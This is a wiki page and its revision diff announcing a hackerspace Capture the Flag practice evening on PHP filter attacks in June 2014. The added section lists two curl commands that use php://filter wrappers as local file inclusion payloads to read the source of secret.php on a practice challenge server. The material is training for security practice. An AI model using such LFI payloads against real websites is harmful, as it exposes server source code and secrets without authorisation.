Difference between revisions of "CTF-practice-evening:2014-06-23"
| Line 14: | Line 14: | ||
* See the page for the [[Ctf-evenings]] | * See the page for the [[Ctf-evenings]] | ||
* Link to the Tech Inc [[TechInc-CTF-Scoreboard | Challenge Website Scoreboard]] | * Link to the Tech Inc [[TechInc-CTF-Scoreboard | Challenge Website Scoreboard]] | ||
| + | |||
| + | = PHP Filter attacks = | ||
| + | |||
| + | * Coolfire is providing the content for this evening! :-) | ||
| + | * Example of LFI attacks: | ||
| + | ** 'php://filter LFI curl -X GET 'http://coolfire.insomnia247.nl/20140623/index.php?page=php://filter/read=string.toupper/resource=secret.php' | ||
| + | ** 'php://filter LFI curl -X GET 'http://coolfire.insomnia247.nl/20140623/index.php?page=php://filter/convert.base64-encode/resource=secret.php' | ||
Revision as of 18:32, 23 June 2014
| CTF-practice-evening:2014-06-23 | |
|---|---|
| Date | 2014/06/23 |
| Time | |
| Location | ACTA |
| Type | Workshop |
| Contact | Melanie |
Capture The Flag evening - Part 20
- 23 June, 2014 - 7 PM
- Please bring along a laptop with you!!!
General CTF Info
- See the page for the Ctf-evenings
- Link to the Tech Inc Challenge Website Scoreboard
PHP Filter attacks
- Coolfire is providing the content for this evening! :-)
- Example of LFI attacks:
- 'php://filter LFI curl -X GET 'http://coolfire.insomnia247.nl/20140623/index.php?page=php://filter/read=string.toupper/resource=secret.php'
- 'php://filter LFI curl -X GET 'http://coolfire.insomnia247.nl/20140623/index.php?page=php://filter/convert.base64-encode/resource=secret.php'
